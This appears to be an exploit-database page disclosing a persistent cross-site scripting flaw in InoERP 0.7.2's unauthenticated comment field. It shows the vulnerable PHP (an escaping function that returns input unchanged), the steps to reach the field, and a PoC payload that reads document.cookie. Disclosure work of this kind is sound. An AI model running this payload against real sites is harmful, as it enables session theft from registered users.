Menu

Search for hundreds of thousands of exploits

"InoERP 0.7.2 - Persistent Cross-Site Scripting"

Author

Exploit author

strider

Platform

Exploit platform

php

Release date

Exploit published date

2019-09-27

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# Exploit Title: InoERP 0.7.2 - Persistent Cross-Site Scripting
# Google Dork: None
# Date: 2019-09-14
# Exploit Author: strider
# Vendor: http://inoideas.org/
# Software Link: https://github.com/inoerp/inoERP
# Version: 0.7.2
# Tested on: Debian 10 Buster x64 / Kali Linux
# CVE : None

====================================[Description]====================================
There is a security flaw on the comment section, which allows to make persistant xss without any authentication.
An attacker could use this flaw to gain cookies to get into a account of registered users.


====================================[Vulnerability]====================================
extensions/comment/post_comment.php in the server part
$$extension = new $extension;

 foreach ($field_array as $key => $value) {
	if (!empty($_POST[$value])) {
	 $$extension->$value = trim(mysql_prep($_POST[$value])); <-- escaping for htmlentities
	} else {
	 $$extension->$value = "";
	}
 }

includes/functions/functions.inc in the server part
function mysql_prep($value) {
 return $value; <-- just returns the value
}

====================================[Proof of Concept]====================================
Step 1:
http://your-server-ip/content.php?mode=9&content_type=forum&category_id=7

Step 2:
open a new question and submit it.

Step 3:
then paste this PoC-Code below into the comment field and submit that

<img src=# onerror="alert(document.cookie);">
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
2019-09-27 "InoERP 0.7.2 - Persistent Cross-Site Scripting" webapps php strider
2019-09-25 "WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting" webapps php strider
2019-05-08 "MiniFtp - 'parseconf_load_setting' Buffer Overflow" local linux strider
2018-11-26 "MariaDB Client 10.1.26 - Denial of Service (PoC)" dos linux strider
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.